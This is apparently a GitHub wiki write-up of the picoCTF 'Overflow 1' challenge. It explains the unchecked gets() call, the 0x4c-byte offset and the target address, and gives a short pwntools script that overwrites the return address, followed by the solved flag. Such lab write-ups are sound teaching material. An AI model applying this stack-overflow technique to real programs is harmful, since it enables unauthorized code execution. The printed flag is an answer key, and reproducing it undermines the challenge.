-
Notifications
You must be signed in to change notification settings - Fork 1
Overflow 1
cheaterdxd edited this page Oct 10, 2019
·
1 revision
You beat the first overflow challenge. Now overflow the buffer and change the return address to the flag function in this program? You can find it in /problems/overflow-1_5_c76a107db1438c97f349f6b2d98fd6f8 on the shell server. Source.
Take control that return address Make sure your address is in Little Endian.
In vuln() function, you can see that the gets() don't check the bound of input value so you can overwrite the return address of vuln() in ebp+4 .
The distance from buf to ebp+4 are 0x4c bytes. So the payload seems :
payload = 'a'*0x4c + flag_address
The flag_address is 0x80485e6 and must be written in Endian.
s = process("./vuln")
flag = 0x80485e6
payload = 'a'*0x4c
payload += p32(flag)
s.sendline(payload)
s.interactive()
picoCTF{n0w_w3r3_ChaNg1ng_r3tURn532066483}